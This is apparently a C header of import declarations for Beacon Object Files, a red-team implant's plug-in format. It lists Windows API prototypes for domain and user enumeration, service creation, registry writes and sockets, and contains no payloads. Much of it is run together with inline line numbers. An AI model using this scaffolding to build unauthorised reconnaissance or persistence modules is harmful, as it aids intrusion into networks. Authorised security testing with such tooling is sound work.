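// NOTE(review): the CRT's strncat returns char * (the destination), not
// wchar_t *. Left unchanged for the same reason as wcscmp above.
WINBASEAPI wchar_t *__cdecl MSVCRT$strncat(char * __restrict__ _Dest,const char * __restrict__ _Source, size_t _Count);
WINBASEAPI wchar_t *__cdecl MSVCRT$wcscpy(wchar_t * __restrict__ _Dest, const wchar_t * __restrict__ _Source);
WINBASEAPI int __cdecl MSVCRT$_wcsicmp(const wchar_t *_Str1,const wchar_t *_Str2);
WINBASEAPI int __cdecl MSVCRT$_wcsnicmp(const wchar_t *_Str1,const wchar_t *_Str2, size_t _Count);
WINBASEAPI int __cdecl MSVCRT$_strnicmp(const char *_Str1,const char *_Str2, size_t _Count);
WINBASEAPI _CONST_RETURN wchar_t *__cdecl MSVCRT$wcschr(const wchar_t *_Str, wchar_t _Ch);

// The original listed this wcsrchr declaration twice in a row; one copy is enough.
WINBASEAPI wchar_t *__cdecl MSVCRT$wcsrchr(const wchar_t *_Str,wchar_t _Ch);
WINBASEAPI unsigned long __cdecl MSVCRT$wcstoul(const wchar_t * __restrict__ _Str,wchar_t ** __restrict__ _EndPtr,int _Radix);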
139 | DECLSPEC_IMPORT char * __cdecl MSVCRT$strcat(char * __restrict__ _Dest,const char * __restrict__ _Source); 140 | WINBASEAPI size_t __cdecl MSVCRT$strnlen(const char *_Str,size_t _MaxCount); 141 | WINBASEAPI size_t __cdecl MSVCRT$strlen(const char *_Str); 142 | DECLSPEC_IMPORT int __cdecl MSVCRT$strcmp(const char *_Str1,const char *_Str2); 143 | DECLSPEC_IMPORT int __cdecl MSVCRT$_stricmp(const char *string1,const char *string2); 144 | WINBASEAPI int __cdecl MSVCRT$strncmp(const char *_Str1,const char *_Str2,size_t _MaxCount); 145 | DECLSPEC_IMPORT char * __cdecl MSVCRT$strcpy(char * __restrict__ __dst, const char * __restrict__ __src); 146 | DECLSPEC_IMPORT PCHAR __cdecl MSVCRT$strstr(const char *haystack, const char *needle); 147 | DECLSPEC_IMPORT PCHAR __cdecl MSVCRT$strchr(const char *haystack, int needle); 148 | DECLSPEC_IMPORT char *__cdecl MSVCRT$strtok(char * __restrict__ _Str,const char * __restrict__ _Delim); 149 | _CRTIMP char *__cdecl MSVCRT$strtok_s(char *_Str,const char *_Delim,char **_Context); 150 | WINBASEAPI unsigned long __cdecl MSVCRT$strtoul(const char * __restrict__ _Str,char ** __restrict__ _EndPtr,int _Radix); 151 | WINBASEAPI size_t __cdecl MSVCRT$strftime(char *_DstBuf,size_t _SizeInBytes,const char *_Format,const struct tm *_Tm); 152 | WINBASEAPI struct tm * __cdecl MSVCRT$gmtime(const time_t *_Time); 153 | WINBASEAPI wchar_t * __cdecl MSVCRT$wcsncat(wchar_t * __restrict__ _Dest,const wchar_t * __restrict__ _Source,size_t _Count); 154 | 155 | //DNSAPI 156 | DECLSPEC_IMPORT DNS_STATUS WINAPI DNSAPI$DnsQuery_A(PCSTR,WORD,DWORD,PIP4_ARRAY,PDNS_RECORD*,PVOID*); 157 | DECLSPEC_IMPORT VOID WINAPI DNSAPI$DnsFree(PVOID pData,DNS_FREE_TYPE FreeType); 158 | 159 | //WSOCK32 160 | DECLSPEC_IMPORT unsigned long __stdcall WSOCK32$inet_addr(const char *cp); 161 | 162 | //NETAPI32 163 | DECLSPEC_IMPORT DWORD WINAPI NETAPI32$DsGetDcNameA(LPVOID, LPVOID, LPVOID, LPVOID, ULONG, LPVOID); 164 | WINBASEAPI DWORD WINAPI NETAPI32$NetUserGetInfo(LPCWSTR 
servername,LPCWSTR username,DWORD level,LPBYTE *bufptr); 165 | WINBASEAPI DWORD WINAPI NETAPI32$NetUserModalsGet(LPCWSTR servername,DWORD level,LPBYTE *bufptr); 166 | WINBASEAPI DWORD WINAPI NETAPI32$NetServerEnum(LMCSTR servername,DWORD level,LPBYTE *bufptr,DWORD prefmaxlen,LPDWORD entriesread,LPDWORD totalentries,DWORD servertype,LMCSTR domain,LPDWORD resume_handle); 167 | WINBASEAPI DWORD WINAPI NETAPI32$NetUserGetGroups(LPCWSTR servername,LPCWSTR username,DWORD level,LPBYTE *bufptr,DWORD prefmaxlen,LPDWORD entriesread,LPDWORD totalentries); 168 | WINBASEAPI DWORD WINAPI NETAPI32$NetUserGetLocalGroups(LPCWSTR servername,LPCWSTR username,DWORD level,DWORD flags,LPBYTE *bufptr,DWORD prefmaxlen,LPDWORD entriesread,LPDWORD totalentries); 169 | WINBASEAPI DWORD WINAPI NETAPI32$NetApiBufferFree(LPVOID Buffer); 170 | WINBASEAPI DWORD WINAPI NETAPI32$NetGetAnyDCName(LPCWSTR servername,LPCWSTR domainname,LPBYTE *bufptr); 171 | WINBASEAPI DWORD WINAPI NETAPI32$NetUserEnum(LPCWSTR servername,DWORD level,DWORD filter,LPBYTE *bufptr,DWORD prefmaxlen,LPDWORD entriesread,LPDWORD totalentries,LPDWORD resume_handle); 172 | WINBASEAPI DWORD WINAPI NETAPI32$NetGroupGetUsers(LPCWSTR servername,LPCWSTR groupname,DWORD level,LPBYTE *bufptr,DWORD prefmaxlen,LPDWORD entriesread,LPDWORD totalentries,PDWORD_PTR ResumeHandle); 173 | WINBASEAPI DWORD WINAPI NETAPI32$NetQueryDisplayInformation(LPCWSTR ServerName,DWORD Level,DWORD Index,DWORD EntriesRequested,DWORD PreferredMaximumLength,LPDWORD ReturnedEntryCount,PVOID *SortedBuffer); 174 | WINBASEAPI DWORD WINAPI NETAPI32$NetLocalGroupEnum(LPCWSTR servername,DWORD level,LPBYTE *bufptr,DWORD prefmaxlen,LPDWORD entriesread,LPDWORD totalentries,PDWORD_PTR resumehandle); 175 | WINBASEAPI DWORD WINAPI NETAPI32$NetLocalGroupGetMembers(LPCWSTR servername,LPCWSTR localgroupname,DWORD level,LPBYTE *bufptr,DWORD prefmaxlen,LPDWORD entriesread,LPDWORD totalentries,PDWORD_PTR resumehandle); 176 | WINBASEAPI DWORD WINAPI NETAPI32$NetUserSetInfo(LPCWSTR 
servername,LPCWSTR username,DWORD level,LPBYTE buf,LPDWORD parm_err); 177 | WINBASEAPI DWORD WINAPI NETAPI32$NetShareEnum(LMSTR servername,DWORD level,LPBYTE *bufptr,DWORD prefmaxlen,LPDWORD entriesread,LPDWORD totalentries,LPDWORD resume_handle); 178 | WINBASEAPI DWORD WINAPI NETAPI32$NetApiBufferFree(LPVOID Buffer); 179 | WINBASEAPI DWORD WINAPI NETAPI32$NetSessionEnum(LPCWSTR servername, LPCWSTR UncClientName, LPCWSTR username, DWORD level, LPBYTE* bufptr, DWORD prefmaxlen, LPDWORD entriesread, LPDWORD totalentries, LPDWORD resumehandle); 180 | WINBASEAPI DWORD WINAPI NETAPI32$NetWkstaUserEnum(LMSTR servername,DWORD level,LPBYTE *bufptr,DWORD prefmaxlen,LPDWORD entriesread,LPDWORD totalentries,LPDWORD resumehandle); 181 | WINBASEAPI DWORD WINAPI NETAPI32$NetWkstaGetInfo(LMSTR servername,DWORD level,LPBYTE *bufptr); 182 | WINBASEAPI DWORD WINAPI NETAPI32$NetStatisticsGet(LMSTR server,LMSTR service,DWORD level,DWORD options,LPBYTE *bufptr); 183 | WINBASEAPI DWORD WINAPI NETAPI32$NetRemoteTOD(LPCWSTR UncServerName,LPBYTE *BufferPtr); 184 | 185 | //mpr 186 | WINBASEAPI DWORD WINAPI MPR$WNetOpenEnumW(DWORD dwScope, DWORD dwType, DWORD dwUsage, LPNETRESOURCEW lpNetResource, LPHANDLE lphEnum); 187 | WINBASEAPI DWORD WINAPI MPR$WNetEnumResourceW(HANDLE hEnum, LPDWORD lpcCount, LPVOID lpBuffer, LPDWORD lpBufferSize); 188 | WINBASEAPI DWORD WINAPI MPR$WNetCloseEnum(HANDLE hEnum); 189 | WINBASEAPI DWORD WINAPI MPR$WNetGetNetworkInformationW(LPCWSTR lpProvider, LPNETINFOSTRUCT lpNetInfoStruct); 190 | WINBASEAPI DWORD WINAPI MPR$WNetGetConnectionW(LPCWSTR lpLocalName, LPWSTR lpRemoteName, LPDWORD lpnLength); 191 | WINBASEAPI DWORD WINAPI MPR$WNetGetResourceInformationW(LPNETRESOURCEW lpNetResource, LPVOID lpBuffer, LPDWORD lpcbBuffer, LPWSTR *lplpSystem); 192 | WINBASEAPI DWORD WINAPI MPR$WNetGetUserW(LPCWSTR lpName, LPWSTR lpUserName, LPDWORD lpnLength); 193 | WINBASEAPI DWORD WINAPI MPR$WNetAddConnection2W(LPNETRESOURCEW lpNetResource, LPCWSTR lpPassword, LPCWSTR 
lpUserName, DWORD dwFlags); 194 | WINBASEAPI DWORD WINAPI MPR$WNetCancelConnection2W(LPCWSTR lpName, DWORD dwFlags, BOOL fForce); 195 | 196 | //user32 197 | WINUSERAPI int WINAPI USER32$EnumDesktopWindows(HDESK hDesktop,WNDENUMPROC lpfn,LPARAM lParam); 198 | WINUSERAPI int WINAPI USER32$IsWindowVisible (HWND hWnd); 199 | WINUSERAPI int WINAPI USER32$GetWindowTextA(HWND hWnd,LPSTR lpString,int nMaxCount); 200 | WINUSERAPI int WINAPI USER32$GetClassNameA(HWND hWnd,LPSTR lpClassName,int nMaxCount); 201 | WINUSERAPI LPWSTR WINAPI USER32$CharPrevW(LPCWSTR lpszStart,LPCWSTR lpszCurrent); 202 | WINUSERAPI HWND WINAPI USER32$FindWindowExA (HWND hWndParent, HWND hWndChildAfter, LPCSTR lpszClass, LPCSTR lpszWindow); 203 | WINUSERAPI LRESULT WINAPI USER32$SendMessageA (HWND hwnd, UINT Msg, WPARAM wParam, LPARAM lParam); 204 | WINUSERAPI int WINAPI USER32$GetWindowTextA(HWND hWnd, LPSTR lpString, int nMaxCount); 205 | WINUSERAPI int WINAPI USER32$GetClassNameA(HWND hWnd, LPTSTR lpClassName, int nMaxCount); 206 | WINUSERAPI BOOL WINAPI USER32$EnumChildWindows(HWND hWndParent, WNDENUMPROC lpEnumFunc, LPARAM lParam); 207 | 208 | //secur32 209 | WINBASEAPI BOOLEAN WINAPI SECUR32$GetUserNameExA (int NameFormat, LPSTR lpNameBuffer, PULONG nSize); 210 | 211 | //shlwapi 212 | WINBASEAPI LPSTR WINAPI SHLWAPI$StrStrIA(LPCSTR lpFirst,LPCSTR lpSrch); 213 | WINBASEAPI int WINAPI SHLWAPI$SHFormatDateTimeA(const FILETIME *pft, DWORD *pdwFlags, LPSTR *pszBuf, UINT cchBuf); 214 | 215 | //advapi32 216 | WINADVAPI WINBOOL WINAPI ADVAPI32$OpenProcessToken (HANDLE ProcessHandle, DWORD DesiredAccess, PHANDLE TokenHandle); 217 | WINADVAPI WINBOOL WINAPI ADVAPI32$GetTokenInformation (HANDLE TokenHandle, TOKEN_INFORMATION_CLASS TokenInformationClass, LPVOID TokenInformation, DWORD TokenInformationLength, PDWORD ReturnLength); 218 | WINADVAPI WINBOOL WINAPI ADVAPI32$ConvertSidToStringSidA(PSID Sid,LPSTR *StringSid); 219 | WINADVAPI WINBOOL WINAPI 
ADVAPI32$ConvertStringSecurityDescriptorToSecurityDescriptorW(LPCWSTR StringSecurityDescriptor,DWORD StringSDRevision,PSECURITY_DESCRIPTOR *SecurityDescriptor,PULONG SecurityDescriptorSize); 220 | WINADVAPI WINBOOL WINAPI ADVAPI32$LookupAccountSidA (LPCSTR lpSystemName, PSID Sid, LPSTR Name, LPDWORD cchName, LPSTR ReferencedDomainName, LPDWORD cchReferencedDomainName, PSID_NAME_USE peUse); 221 | WINADVAPI WINBOOL WINAPI ADVAPI32$LookupAccountSidW (LPCWSTR lpSystemName, PSID Sid, LPWSTR Name, LPDWORD cchName, LPWSTR ReferencedDomainName, LPDWORD cchReferencedDomainName, PSID_NAME_USE peUse); 222 | WINADVAPI WINBOOL WINAPI ADVAPI32$LookupPrivilegeNameA (LPCSTR lpSystemName, PLUID lpLuid, LPSTR lpName, LPDWORD cchName); 223 | WINADVAPI WINBOOL WINAPI ADVAPI32$LookupPrivilegeDisplayNameA (LPCSTR lpSystemName, LPCSTR lpName, LPSTR lpDisplayName, LPDWORD cchDisplayName, LPDWORD lpLanguageId); 224 | WINADVAPI SC_HANDLE WINAPI ADVAPI32$OpenSCManagerA(LPCSTR lpMachineName,LPCSTR lpDatabaseName,DWORD dwDesiredAccess); 225 | WINADVAPI SC_HANDLE WINAPI ADVAPI32$OpenServiceA(SC_HANDLE hSCManager,LPCSTR lpServiceName,DWORD dwDesiredAccess); 226 | WINADVAPI WINBOOL WINAPI ADVAPI32$QueryServiceStatus(SC_HANDLE hService,LPSERVICE_STATUS lpServiceStatus); 227 | WINADVAPI WINBOOL WINAPI ADVAPI32$QueryServiceConfigA(SC_HANDLE hService,LPQUERY_SERVICE_CONFIGA lpServiceConfig,DWORD cbBufSize,LPDWORD pcbBytesNeeded); 228 | WINADVAPI WINBOOL WINAPI ADVAPI32$CloseServiceHandle(SC_HANDLE hSCObject); 229 | WINADVAPI WINBOOL WINAPI ADVAPI32$EnumServicesStatusExA(SC_HANDLE hSCManager,SC_ENUM_TYPE InfoLevel,DWORD dwServiceType,DWORD dwServiceState,LPBYTE lpServices,DWORD cbBufSize,LPDWORD pcbBytesNeeded,LPDWORD lpServicesReturned,LPDWORD lpResumeHandle,LPCSTR pszGroupName); 230 | WINADVAPI WINBOOL WINAPI ADVAPI32$QueryServiceStatusEx(SC_HANDLE hService,SC_STATUS_TYPE InfoLevel,LPBYTE lpBuffer,DWORD cbBufSize,LPDWORD pcbBytesNeeded); 231 | WINADVAPI WINBOOL WINAPI 
ADVAPI32$QueryServiceConfig2A(SC_HANDLE hService,DWORD dwInfoLevel,LPBYTE lpBuffer,DWORD cbBufSize,LPDWORD pcbBytesNeeded); 232 | WINADVAPI WINBOOL WINAPI ADVAPI32$ChangeServiceConfig2A(SC_HANDLE hService,DWORD dwInfoLevel,LPVOID lpInfo); 233 | WINADVAPI WINBOOL WINAPI ADVAPI32$ChangeServiceConfigA(SC_HANDLE hService,DWORD dwServiceType,DWORD dwStartType,DWORD dwErrorControl,LPCSTR lpBinaryPathName,LPCSTR lpLoadOrderGroup,LPDWORD lpdwTagId,LPCSTR lpDependencies,LPCSTR lpServiceStartName,LPCSTR lpPassword,LPCSTR lpDisplayName); 234 | WINADVAPI SC_HANDLE WINAPI ADVAPI32$CreateServiceA(SC_HANDLE hSCManager,LPCSTR lpServiceName,LPCSTR lpDisplayName,DWORD dwDesiredAccess,DWORD dwServiceType,DWORD dwStartType,DWORD dwErrorControl,LPCSTR lpBinaryPathName,LPCSTR lpLoadOrderGroup,LPDWORD lpdwTagId,LPCSTR lpDependencies,LPCSTR lpServiceStartName,LPCSTR lpPassword); 235 | WINADVAPI WINBOOL WINAPI ADVAPI32$DeleteService(SC_HANDLE hService); 236 | WINADVAPI LONG WINAPI ADVAPI32$RegOpenKeyExW(HKEY hKey,LPCWSTR lpSubKey,DWORD ulOptions,REGSAM samDesired,PHKEY phkResult); 237 | WINADVAPI WINBOOL WINAPI ADVAPI32$EnumServicesStatusExW(SC_HANDLE hSCManager,SC_ENUM_TYPE InfoLevel,DWORD dwServiceType,DWORD dwServiceState,LPBYTE lpServices,DWORD cbBufSize,LPDWORD pcbBytesNeeded,LPDWORD lpServicesReturned,LPDWORD lpResumeHandle,LPCWSTR pszGroupName); 238 | WINADVAPI LONG WINAPI ADVAPI32$RegCreateKeyA(HKEY hKey,LPCSTR lpSubKey,PHKEY phkResult); 239 | WINADVAPI LONG WINAPI ADVAPI32$RegSetValueExA(HKEY hKey,LPCSTR lpValueName,DWORD Reserved,DWORD dwType,CONST BYTE *lpData,DWORD cbData); 240 | WINADVAPI LONG WINAPI ADVAPI32$RegOpenKeyExA(HKEY hKey,LPCSTR lpSubKey,DWORD ulOptions,REGSAM samDesired,PHKEY phkResult); 241 | WINADVAPI LONG WINAPI ADVAPI32$RegConnectRegistryA(LPCSTR lpMachineName,HKEY hKey,PHKEY phkResult); 242 | WINADVAPI LONG WINAPI ADVAPI32$RegCloseKey(HKEY hKey); 243 | WINADVAPI LONG WINAPI ADVAPI32$RegOpenKeyA(HKEY hKey,LPCSTR lpSubKey,PHKEY phkResult); 244 | WINADVAPI LONG 
WINAPI ADVAPI32$RegCreateKeyExA(HKEY hKey,LPCSTR lpSubKey,DWORD Reserved,LPSTR lpClass,DWORD dwOptions,REGSAM samDesired,LPSECURITY_ATTRIBUTES lpSecurityAttributes,PHKEY phkResult,LPDWORD lpdwDisposition); 245 | WINADVAPI LONG WINAPI ADVAPI32$RegDeleteKeyExA(HKEY hKey,LPCSTR lpSubKey,REGSAM samDesired,DWORD Reserved); 246 | WINADVAPI LONG WINAPI ADVAPI32$RegDeleteKeyValueA(HKEY hKey,LPCSTR lpSubKey,LPCSTR lpValueName); 247 | WINADVAPI LONG WINAPI ADVAPI32$RegQueryValueExA(HKEY hKey,LPCSTR lpValueName,LPDWORD lpReserved,LPDWORD lpType,LPBYTE lpData,LPDWORD lpcbData); 248 | WINADVAPI LONG WINAPI ADVAPI32$RegQueryInfoKeyA(HKEY hKey,LPSTR lpClass,LPDWORD lpcchClass,LPDWORD lpReserved,LPDWORD lpcSubKeys,LPDWORD lpcbMaxSubKeyLen,LPDWORD lpcbMaxClassLen,LPDWORD lpcValues,LPDWORD lpcbMaxValueNameLen,LPDWORD lpcbMaxValueLen,LPDWORD lpcbSecurityDescriptor,PFILETIME lpftLastWriteTime); 249 | WINADVAPI LONG WINAPI ADVAPI32$RegEnumValueA(HKEY hKey,DWORD dwIndex,LPSTR lpValueName,LPDWORD lpcchValueName,LPDWORD lpReserved,LPDWORD lpType,LPBYTE lpData,LPDWORD lpcbData); 250 | WINADVAPI LONG WINAPI ADVAPI32$RegEnumKeyExA(HKEY hKey,DWORD dwIndex,LPSTR lpName,LPDWORD lpcchName,LPDWORD lpReserved,LPSTR lpClass,LPDWORD lpcchClass,PFILETIME lpftLastWriteTime); 251 | WINADVAPI LONG WINAPI ADVAPI32$RegDeleteValueA(HKEY hKey,LPCSTR lpValueName); 252 | WINADVAPI LONG WINAPI ADVAPI32$RegQueryValueExW(HKEY hKey,LPCWSTR lpValueName,LPDWORD lpReserved,LPDWORD lpType,LPBYTE lpData,LPDWORD lpcbData); 253 | WINADVAPI LONG WINAPI ADVAPI32$RegSaveKeyExA(HKEY hKey,LPCSTR lpFile,LPSECURITY_ATTRIBUTES lpSecurityAttributes,DWORD Flags); 254 | WINADVAPI WINBOOL WINAPI ADVAPI32$GetFileSecurityW (LPCWSTR lpFileName, SECURITY_INFORMATION RequestedInformation, PSECURITY_DESCRIPTOR pSecurityDescriptor, DWORD nLength, LPDWORD lpnLengthNeeded); 255 | WINADVAPI WINBOOL WINAPI ADVAPI32$GetSecurityDescriptorOwner (PSECURITY_DESCRIPTOR pSecurityDescriptor, PSID *pOwner, LPBOOL lpbOwnerDefaulted); 256 | WINADVAPI 
WINBOOL WINAPI ADVAPI32$GetSecurityDescriptorDacl (PSECURITY_DESCRIPTOR pSecurityDescriptor, LPBOOL lpbDaclPresent, PACL *pDacl, LPBOOL lpbDaclDefaulted); 257 | WINADVAPI WINBOOL WINAPI ADVAPI32$GetAclInformation (PACL pAcl, LPVOID pAclInformation, DWORD nAclInformationLength, ACL_INFORMATION_CLASS dwAclInformationClass); 258 | WINADVAPI WINBOOL WINAPI ADVAPI32$GetAce (PACL pAcl, DWORD dwAceIndex, LPVOID *pAce); 259 | WINADVAPI WINBOOL WINAPI ADVAPI32$LookupAccountSidW (LPCWSTR lpSystemName, PSID Sid, LPWSTR Name, LPDWORD cchName, LPWSTR ReferencedDomainName, LPDWORD cchReferencedDomainName, PSID_NAME_USE peUse); 260 | WINADVAPI WINBOOL WINAPI ADVAPI32$ConvertSidToStringSidW(PSID Sid,LPWSTR *StringSid); 261 | WINADVAPI VOID WINAPI ADVAPI32$MapGenericMask (PDWORD AccessMask, PGENERIC_MAPPING GenericMapping); 262 | WINADVAPI WINBOOL WINAPI ADVAPI32$OpenProcessToken (HANDLE ProcessHandle, DWORD DesiredAccess, PHANDLE TokenHandle); 263 | WINADVAPI WINBOOL WINAPI ADVAPI32$GetTokenInformation (HANDLE TokenHandle, TOKEN_INFORMATION_CLASS TokenInformationClass, LPVOID TokenInformation, DWORD TokenInformationLength, PDWORD ReturnLength); 264 | WINADVAPI WINBOOL WINAPI ADVAPI32$InitializeSecurityDescriptor (PSECURITY_DESCRIPTOR pSecurityDescriptor, DWORD dwRevision); 265 | WINADVAPI WINBOOL WINAPI ADVAPI32$SetSecurityDescriptorDacl (PSECURITY_DESCRIPTOR pSecurityDescriptor, WINBOOL bDaclPresent, PACL pDacl, WINBOOL bDaclDefaulted); 266 | WINADVAPI WINBOOL WINAPI ADVAPI32$ConvertSecurityDescriptorToStringSecurityDescriptorW(PSECURITY_DESCRIPTOR SecurityDescriptor,DWORD RequestedStringSDRevision,SECURITY_INFORMATION SecurityInformation,LPWSTR *StringSecurityDescriptor,PULONG StringSecurityDescriptorLen); 267 | WINADVAPI WINBOOL WINAPI ADVAPI32$StartServiceA(SC_HANDLE hService,DWORD dwNumServiceArgs,LPCSTR *lpServiceArgVectors); 268 | WINADVAPI WINBOOL WINAPI ADVAPI32$ControlService(SC_HANDLE hService,DWORD dwControl,LPSERVICE_STATUS lpServiceStatus); 269 | WINADVAPI WINBOOL 
WINAPI ADVAPI32$EnumDependentServicesA(SC_HANDLE hService,DWORD dwServiceState,LPENUM_SERVICE_STATUSA lpServices,DWORD cbBufSize,LPDWORD pcbBytesNeeded,LPDWORD lpServicesReturned); 270 | WINADVAPI LSTATUS WINAPI ADVAPI32$RegQueryInfoKeyA(HKEY hKey, LPSTR lpClass, LPDWORD lpcchClass, LPDWORD lpReserved, LPDWORD lpcSubKeys, LPDWORD lpcbMaxSubKeyLen, LPDWORD lpcbMaxClassLen, LPDWORD lpcValues, LPDWORD lpcbMaxValueNameLen, LPDWORD lpcbMaxValueLen, LPDWORD lpcbSecurityDescriptor, PFILETIME lpftLastWriteTime); 271 | 272 | //NTDLL 273 | WINBASEAPI NTSTATUS NTAPI NTDLL$NtCreateFile(PHANDLE FileHandle,ACCESS_MASK DesiredAccess,POBJECT_ATTRIBUTES ObjectAttributes,PIO_STATUS_BLOCK IoStatusBlock,PLARGE_INTEGER AllocationSize,ULONG FileAttributes,ULONG ShareAccess,ULONG CreateDisposition,ULONG CreateOptions,PVOID EaBuffer,ULONG EaLength); 274 | WINBASEAPI NTSTATUS NTAPI NTDLL$NtClose(HANDLE Handle); 275 | WINBASEAPI NTSTATUS NTAPI NTDLL$NtFsControlFile(HANDLE FileHandle,HANDLE Event,PIO_APC_ROUTINE ApcRoutine,PVOID ApcContext,PIO_STATUS_BLOCK IoStatusBlock,ULONG IoControlCode,PVOID InputBuffer,ULONG InputBufferLength,PVOID OutputBuffer,ULONG OutputBufferLength); 276 | 277 | //IMAGEHLP 278 | WINBASEAPI WINBOOL IMAGEAPI IMAGEHLP$ImageEnumerateCertificates(HANDLE FileHandle,WORD TypeFilter,PDWORD CertificateCount,PDWORD Indices,DWORD IndexCount); 279 | WINBASEAPI WINBOOL IMAGEAPI IMAGEHLP$ImageGetCertificateHeader(HANDLE FileHandle,DWORD CertificateIndex,LPWIN_CERTIFICATE Certificateheader); 280 | WINBASEAPI WINBOOL IMAGEAPI IMAGEHLP$ImageGetCertificateData(HANDLE FileHandle,DWORD CertificateIndex,LPWIN_CERTIFICATE Certificate,PDWORD RequiredLength); 281 | 282 | //crypt32 283 | WINIMPM WINBOOL WINAPI CRYPT32$CryptVerifyMessageSignature (PCRYPT_VERIFY_MESSAGE_PARA pVerifyPara, DWORD dwSignerIndex, const BYTE *pbSignedBlob, DWORD cbSignedBlob, BYTE *pbDecoded, DWORD *pcbDecoded, PCCERT_CONTEXT *ppSignerCert); 284 | WINIMPM DWORD WINAPI CRYPT32$CertGetNameStringW (PCCERT_CONTEXT 
pCertContext, DWORD dwType, DWORD dwFlags, void *pvTypePara, LPWSTR pszNameString, DWORD cchNameString); 285 | WINIMPM PCCERT_CONTEXT WINAPI CRYPT32$CertCreateCertificateContext (DWORD dwCertEncodingType, const BYTE *pbCertEncoded, DWORD cbCertEncoded); 286 | WINIMPM WINBOOL WINAPI CRYPT32$CertFreeCertificateContext (PCCERT_CONTEXT pCertContext); 287 | WINIMPM WINBOOL WINAPI CRYPT32$CertGetCertificateContextProperty (PCCERT_CONTEXT pCertContext, DWORD dwPropId, void *pvData, DWORD *pcbData); 288 | WINIMPM WINBOOL WINAPI CRYPT32$CertGetCertificateChain (HCERTCHAINENGINE hChainEngine, PCCERT_CONTEXT pCertContext, LPFILETIME pTime, HCERTSTORE hAdditionalStore, PCERT_CHAIN_PARA pChainPara, DWORD dwFlags, LPVOID pvReserved, PCCERT_CHAIN_CONTEXT *ppChainContext); 289 | WINIMPM VOID WINAPI CRYPT32$CertFreeCertificateChain (PCCERT_CHAIN_CONTEXT pChainContext); 290 | WINIMPM PCCRYPT_OID_INFO WINAPI CRYPT32$CryptFindOIDInfo (DWORD dwKeyType, void *pvKey, DWORD dwGroupId); 291 | 292 | //WS2_32 293 | // defining this here to avoid including ws2tcpip.h which results in include order warnings when bofs include windows.h before bofdefs.h 294 | typedef struct addrinfo { 295 | int ai_flags; 296 | int ai_family; 297 | int ai_socktype; 298 | int ai_protocol; 299 | size_t ai_addrlen; 300 | char *ai_canonname; 301 | struct sockaddr *ai_addr; 302 | struct addrinfo *ai_next; 303 | } ADDRINFOA,*PADDRINFOA; 304 | 305 | //WS2_32 306 | DECLSPEC_IMPORT int __stdcall WS2_32$connect(SOCKET sock, const struct sockaddr* name, int namelen); 307 | DECLSPEC_IMPORT int __stdcall WS2_32$closesocket(SOCKET sock); 308 | DECLSPEC_IMPORT void __stdcall WS2_32$freeaddrinfo(struct addrinfo* ai); 309 | DECLSPEC_IMPORT int __stdcall WS2_32$getaddrinfo(char* host, char* port, const struct addrinfo* hints, struct addrinfo** result); 310 | DECLSPEC_IMPORT u_long __stdcall WS2_32$htonl(u_long hostlong); 311 | DECLSPEC_IMPORT u_short __stdcall WS2_32$htons(u_short hostshort); 312 | DECLSPEC_IMPORT char * __stdcall 
WS2_32$inet_ntoa(struct in_addr in); 313 | DECLSPEC_IMPORT int __stdcall WS2_32$ioctlsocket(SOCKET sock, long cmd, u_long* arg); 314 | DECLSPEC_IMPORT int __stdcall WS2_32$select(int nfds, fd_set* readfds, fd_set* writefds, fd_set* exceptfds, const struct timeval* timeout); 315 | DECLSPEC_IMPORT unsigned int __stdcall WS2_32$socket(int af, int type, int protocol); 316 | DECLSPEC_IMPORT int __stdcall WS2_32$__WSAFDIsSet(SOCKET sock, struct fd_set* fdset); 317 | DECLSPEC_IMPORT int __stdcall WS2_32$WSAGetLastError(); 318 | DECLSPEC_IMPORT LPCWSTR WINAPI WS2_32$InetNtopW(INT Family, LPCVOID pAddr, LPWSTR pStringBuf, size_t StringBufSIze); 319 | DECLSPEC_IMPORT INT WINAPI WS2_32$inet_pton(INT Family, LPCSTR pStringBuf, PVOID pAddr); 320 | 321 | //dnsapi 322 | DECLSPEC_IMPORT VOID WINAPI DNSAPI$DnsFree(PVOID pData,DNS_FREE_TYPE FreeType); 323 | DECLSPEC_IMPORT int WINAPI DNSAPI$DnsGetCacheDataTable(PVOID data); 324 | 325 | //OLE32 326 | DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoInitializeEx (LPVOID pvReserved, DWORD dwCoInit); 327 | DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoUninitialize (void); 328 | DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoInitializeSecurity (PSECURITY_DESCRIPTOR pSecDesc, LONG cAuthSvc, SOLE_AUTHENTICATION_SERVICE *asAuthSvc, void *pReserved1, DWORD dwAuthnLevel, DWORD dwImpLevel, void *pAuthList, DWORD dwCapabilities, void *pReserved3); 329 | DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoCreateInstance (REFCLSID rclsid, LPUNKNOWN pUnkOuter, DWORD dwClsContext, REFIID riid, LPVOID *ppv); 330 | DECLSPEC_IMPORT HRESULT WINAPI OLE32$CLSIDFromString (LPCOLESTR lpsz, LPCLSID pclsid); 331 | DECLSPEC_IMPORT HRESULT WINAPI OLE32$IIDFromString (LPCOLESTR lpsz, LPIID lpiid); 332 | DECLSPEC_IMPORT int WINAPI OLE32$StringFromGUID2 (REFGUID rguid, LPOLESTR lpsz, int cchMax); 333 | DECLSPEC_IMPORT HRESULT WINAPI OLE32$CoSetProxyBlanket(IUnknown* pProxy, DWORD dwAuthnSvc, DWORD dwAuthzSvc, OLECHAR* pServerPrincName, DWORD dwAuthnLevel, DWORD dwImpLevel, RPC_AUTH_IDENTITY_HANDLE 
pAuthInfo, DWORD dwCapabilities); 334 | DECLSPEC_IMPORT LPVOID WINAPI OLE32$CoTaskMemAlloc(SIZE_T cb); 335 | DECLSPEC_IMPORT void WINAPI OLE32$CoTaskMemFree(LPVOID pv); 336 | 337 | //OLEAUT32 338 | DECLSPEC_IMPORT BSTR WINAPI OLEAUT32$SysAllocString(const OLECHAR *); 339 | DECLSPEC_IMPORT INT WINAPI OLEAUT32$SysReAllocString(BSTR *, const OLECHAR *); 340 | DECLSPEC_IMPORT void WINAPI OLEAUT32$SysFreeString(BSTR); 341 | DECLSPEC_IMPORT UINT WINAPI OLEAUT32$SysStringLen(BSTR); 342 | DECLSPEC_IMPORT void WINAPI OLEAUT32$VariantInit(VARIANTARG *pvarg); 343 | DECLSPEC_IMPORT void WINAPI OLEAUT32$VariantClear(VARIANTARG *pvarg); 344 | DECLSPEC_IMPORT HRESULT WINAPI OLEAUT32$SysAddRefString(BSTR); 345 | DECLSPEC_IMPORT HRESULT WINAPI OLEAUT32$VariantChangeType(VARIANTARG *pvargDest, VARIANTARG *pvarSrc, USHORT wFlags, VARTYPE vt); 